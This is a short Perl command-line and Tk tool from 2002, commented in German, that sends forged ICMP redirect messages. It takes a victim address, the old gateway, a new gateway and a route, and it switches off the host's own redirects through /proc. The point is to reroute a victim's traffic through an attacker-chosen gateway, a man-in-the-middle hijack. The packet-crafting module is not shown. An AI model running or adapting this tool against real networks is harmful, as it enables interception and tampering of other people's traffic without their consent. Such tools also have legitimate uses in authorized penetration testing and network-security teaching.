#!/usr/bin/perl
# ICMP-Redirection-Tool mit Tk-Frontend 
# Autor: stefan@krecher.de 
#
# Updated by Bastian Ballmann
#
# Last update: 22.12.2002
#
# Lizenz: GPL
#
# Requirements
# ------------
#
# TODO
# ----

# Are you r00t?
if($> != 0)
{
    die "You must be root...\n";
}

###[ Loading modules ]###

use Tk;
use Getopt::Std;     
use path::hijack;
use path::config;


###[ MAIN PART ]###

# /proc Veraenderungen vornehmen
# Redirects zu lassen
open(REDIR,">/proc/sys/net/ipv4/conf/all/send_redirects") || die "Cannot write to /proc/sys/net/ipv4/conf/all/send_redirects!\n$!\n\n";
print REDIR "0";
close(REDIR);

# Load GUI version?
if($ARGV[0] eq "--gui")
{
    require "icmpredir-gui.pl";
}
# Terminal version
else
{
# Need help?
    if(($ARGV[0] eq "--help") || (scalar(@ARGV) < 4))
    {
	die "$0 -h <victim> -a <old_gw> -g <new_gw> -r <route>\n\n";
    }

    # Parsing parameter
    getopts('h:a:g:r:',\%args);

    $victim = $args{'h'};
    $alter_gw = $args{'a'};
    $neuer_gw = $args{'g'};
    $ziel_der_route = $args{'r'};
    icmp_redir_send();
}


###[ Subroutines ]###

#
# icmp_redir_send() - verschickt ICMP-Redir-Nachrichten
# TODO: im Kommentar icmp-typ erklren

sub icmp_redir_send() {
    
    if(config::check_address($victim) == 1)
    {
	print_error("Bad ip address $victim\n");
	return;
    }

    if(config::check_address($alter_gw) == 1)
    {
	print_error("Bad ip address $alter_gw\n");
	return;
    }

    if(config::check_address($neuer_gw) == 1)
    {
	print_error("Bad ip address $neuer_gw\n");
	return;
    }

    if(config::check_address($ziel_der_route) == 1)
    {
	print_error("Bad ip address $ziel_der_route\n");
	return;
    }

  hijack::icmp_redirect($victim, $alter_gw, $neuer_gw, $ziel_der_route);
    return 1;
}


# Print an error message
sub print_error
{
    my $error = shift;

    if($ARGV[0] eq "--gui")
    {
	show_error($error);
    }
    else
    {
	die "$error";
    }
}
